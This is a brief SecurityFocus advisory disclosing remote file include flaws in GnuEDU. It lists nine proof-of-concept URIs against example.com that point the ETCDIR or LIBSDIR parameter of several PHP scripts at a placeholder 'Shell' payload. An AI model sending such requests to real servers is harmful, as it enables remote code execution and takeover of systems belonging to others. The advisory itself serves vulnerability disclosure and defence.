GnuEDU Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/libs/lom.php?ETCDIR=Shell
http://www.example.com/scripts/lom_update.php?ETCDIR=Shell
http://www.example.com/scripts/check-lom.php?ETCDIR=Shell
http://www.example.com/scripts/weigh_keywords.php?ETCDIR=Shell
http://www.example.com/web/logout.php?LIBSDIR=Shell
http://www.example.com/web/help.php?LIBSDIR=Shell
http://www.example.com/web/index.php?LIBSDIR=Shell
http://www.example.com/web/login.php?LIBSDIR=Shell
http://www.example.com/web/lom.php?ETCDIR=Shell


 

Privacy Statement
Copyright 2010, SecurityFocus